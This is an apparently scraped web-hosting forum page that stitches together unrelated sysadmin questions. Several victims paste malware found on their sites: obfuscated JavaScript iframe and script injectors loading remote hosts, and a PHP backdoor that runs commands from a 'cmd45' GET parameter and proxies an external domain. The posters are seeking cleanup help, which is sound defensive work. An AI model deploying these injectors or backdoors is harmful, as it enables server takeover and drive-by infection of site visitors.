I've been having an issue with one of my sites were someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.
I have a dedicated server have already upgraded MySQL to the latest version as I though that might work but it hasn't.
I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
WHM+cPanel
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
all sites in my server have maliciose code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
how to localize this code in my sites, using grep.
My server work in centos.
for the first time in my sites life(10 year site) google blocked it. when you type my site google says that my site has malicious code in it.as we find it the problem in my site came from the company where i hosted it.we clear all the files for the malicious code and now its all ok.i want to ask if anyone knows for his experience how much days google will check my site again to see if all its ok.i send them before six hours via webmaster tools, a request for eaming agin my site,but i dont knwo how will do these. so i am asking anyone of you,who had same experience.any help will be appreciate.please help me with anything you think that might be useful for me to having my site back again in google correctly!
View 5 Replies View Relatedwe have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?
The problem:
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server:
1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?
[url]
i manage linux apache webserver with a few wordpress blogs and from time to time i see someone inject a malicious .php file into wp-content/uploads/2014/10/ directory.
i think its some bad plugin or theme, but these is more blogs, i ugrade, update, WP, but
how can i setup some monitor to tell me which php file (or even line in php file) injected that malicious .php ? I have linux root access so i can setup anythingÂ
I have multiple demo websites under single domain. and in each folder default page is as index.html
few days back i have observed a blank space on each index.html. when i check the code then i have found an auto generated code just after the body tag in index.html. the code is as follows
<div style="visibility:hidden"><iframe src="[url]
Also I am getting Question marks (?) in some blank spaces in HTML preview.
I have removed it but it again appears after some time. I have contacted to server support but they said that this is SQL Injection attack but there is no database connectivity involved in any of my websites.
I have subdomain, the index file was hacked
Who know how to protect the Index files with cpanel
I would like to replace my index file every three hours, with a specified file on the server thats in a different folder (someone keeps putting unwanted stuff in my index file) Can someone explain to me how this is done?
View 2 Replies View RelatedOne of my customers has been having a problem with his index files not showing up. It'll display the parent directory, and you can clearly see the index.html file in there, but it won't show it as the index.
It happened in one directory, and I went into .htaccess and did DirectoryIndex index.php.... but now i'm wondering if its part of a bigger problem, because its happening to other folders now.
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.
View 1 Replies View RelatedI am trying to create a new domain and I am getting this error
Error: vhostmng failed: Access is denied. (Error code 5) at retrieves attributes for file or directory D:PleskVHOSTS
s1.caboodledns.com
achaelwillment.com
(Error code 1)
I have done permission repairs via the plesk tool on the server but I still get this error. What user needs what permissions to fix this?
I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.
The problem is that their old index.htm page has a pagerank of 4 which we want to keep.
And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.
The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.
My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?
JavaScript, I have heard is completely out the question
when I try to send Email from horde I have this:
PHP Code:
There was an error sending your message: Failed to add recipient: xxxxx@hotmail.com [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)]
I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.
when I add "?" to the end of the URL[url]" it runs with no problems!
Is it something wrong with httpd.conf or what?
We are having a problem with a number of our websites hosted on Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.
An example of the code that has been inserted can be found below:
<!--
document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6
yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs
crRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,""));
-->
Which runs this script:
<script src=//67.215.246.34/jquery.js></script>
New pages have been created on a number of websites aswell as the above code inserted into existing pages.
After removing the above code from one particular website it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.
Has anyone here ever heard of a malicious script called Mulcishell, stored in the file mshell.php? I've seen a bunch of instances of the file in my clients' folders with permissions 777, and I want to know what it does and how it works. (I already deleted the file, knowing it was a malicious script, but I want to know how to prevent it from ever being executed on my server.)
View 1 Replies View Relatedwe received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs shows that the connection was made from 127.0.0.1 to the smtp service, but that's it.
We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.
I had csf firewall installed, and due to my own stupidity, attempted to login with the wrong password one too many times, which added my IP to iptables, locking me out. I had to SSH into a linux box at school, and then ssh into my server to stop the iptables service so I could get into my server.
I removed every trace of my IP that I could find in csf, but sometime in the middle of the night, iptables reloads some rules from somewhere that blocks me again. I also tried doing iptables -F to clear all rules, but again, sometime in the middle of the night, rules are reloaded and I get blocked. I even uninstalled csf to no avail. I just want to remove my IP once and for all.
i just got a 2nd server
i had a problem at the beginning that i had to reload
so i think the tech forgot to add my other ips to my network card configs
i remember layeredtech once reloaded my server and the same problem happend so they advised me to add it to a config file in my server
I am wanting to know if there is a way to stop files being uploaded to my vps, via ftp cpanel etc that are malicious..
I have been told there is a way to do this but i havent been told how..
Basicaly i want to know if there is something where i can add a list of keywords that are in the malicious files and what ever it is will stop them from being uploaded or if they manage to get uploaded onto my vps will it make them not work?
I am looking into this as i had an issue before where someone uploaded a shell onto my server :@ luckily it didnt cause no damage or he didnt get anywhere but i still want to be safe.
I decided to apply PHP safe mode to my servers, considering:
- I cannot prohibit using exec functions (some binary uses are needed, like host, mysqldump, etc..)
- I cannot restrict at all via UID/GID method at bins due to several problems..
Safe mode is the final sollution, as I only need "safe_mode_exec_dir" config to set a folder with the necesary binaries... this will stop nobody user (Apache) to exec whatever it wants, like perl, binaries uploaded to an public insecure folder (exploits), or anything else... people only could exec() the binaries I want and where I want. This will stop finally 95% of my hack problems.
Well. The problem is safe_mode is enabled or not, but you cannot set o disable certain features of this safe mode, like UID/GID checks (*******!)...
I am trying to configure so only "safe_mode_exec_dir" would apply, so:
- Including UIDs checks disabled by:
safe_mode_include_dir = "/home/"
(tested)
- Some variables set to NULL, as safe_mode_allowed_env_vars or safe_mode_protected_env_vars...
- safe_mode_exec_dir = "/usr/phpbin/"
Great! with symbolic lynks in... the best sollution available for me.
- open_basedir = "/home/"
(for fopen, etc...)
Ok ok.. but problems there.. by example this one:
Quote:
Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 32015 is not allowed to access cache/dynamic_fields/modules.php owned by uid 99 in /home/yyyyyyyyy/public_html/chn/modules/DynamicFields/DynamicField.php on line 823
Great.. fopen is under UID/GID checks, but it is not an include, so safe_mode_include_dir would not apply...
Now fopen, link, unlink, etc.. functions are UID restricted and this seems to be impossible to disable.... pffffffff...
can you share your safe_mode configs or sollutions for this problem?
When I add a new site via New Account in WHM and once the domain resolves, the cPanel 'Great Success' page shows. I have verified the site is resolving properly.
This is a brand new installation and the only changes I have made is I updated apache via WHM.
My fedora server is running apf firewall. When I turn it off, clients can connect.
When I turn it on, it says MSG: Contacting Server.
I have already added ports 6100 and 3784 to /etc/apf/conf.apf by adding the ports to the lines, EG_TCP_CPORTS, EG_UDP_CPORTS, IG_TCP_CPORTS, and IG_UDP_CPORTS
and restarted the service.
Is there any additional ports I need to add?
(I've uploaded my conf.apf file)
i find on the certain time,
the mysql of server will run a lot of query,
and the io and load will become very high,
after the time point,
all the io and load with be smoth,
so,i wonder if any Cron job has been add (by certain account) to run something,
Many of my websites on my server have been hacked, it randomly add's
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
and
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src='http://aboutmynews.org/news/InF.php' style='display:none;'></iframe--><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,46,22,39,35,15,23,8,28,0,0,0,0,0,0,2,25,55,54,30,40,13,57,14,12,53,47,43,19,38,3,37,33,58,18,36,44,20,24,51,60,29,0,0,0,0,41,0,0,45,48,9,32,17,59,31,6,61,5,4,7,27,50,56,62,34,10,52,1,16,21,26,42,11);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("kNdXOhF18O9QSX9cfBINV3WXaXUcFmFNV3p1shZcahFNw3pc7MIoahUo7mIc75APkxjJi5_eFmZtw0_rssFcmOAt7ObJfKE1s5UrzKIcSnbrIK9caBjrwB9J@3EJfXZoa5_euXUJw4I190GosKIcDspNAy8XOhF18OYN")</script><!-- ~ -->
To some of my pages on my websites in my /home directory.
Please do not visit the links without anti virus protection.
what command I can use to search all of my files in my home directory for this?
I just added a new PHP Handler with PHP Verison 5.5.18 as cgi and i always get an error when activating. I used the samte setting and php ini as the Buildin Ones
root@ip1:/usr/local/src/php-5.5.18# /usr/local/psa/bin/php_handler --list
id: display name: full version: version: type: cgi-bin: php-cli: php.ini: custom:
5.5.18 5.5.18 5.5.18 5.5 cgi /usr/local/php550-cgi/bin/php-cgi /etc/php5/cli/php.ini true
cgi 5.3.29 5.3.29 5.3 cgi /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
fastcgi 5.3.29 5.3.29 5.3 fastcgi /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
module 5.3.29 5.3.29 5.3 module /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
When i want to activate it i get
Fehler: phpinimng failed: Cannot parse php.ini: (<class 'php_ini.PhpIniSyntaxError'>, PhpIniSyntaxError('[<stdin>:24] Invalid configuration line. Are there excessive leading spaces?',))
I get this even if i want to activate a build in one.
In my additional php config i have
mail.log = /var/log/phpmail.log
mail.add_x_header = On
date.timezone = "Europe/Berlin"
[Zend]
zend_extension=/usr/lib/php/modules/ioncube_loader_lin_5.3.so
zend_extension=/usr/lib/php5/ZendGuardLoader.so
sendmail_path = /usr/sbin/sendmail-wrapper-php
I am using Debian Squeeze.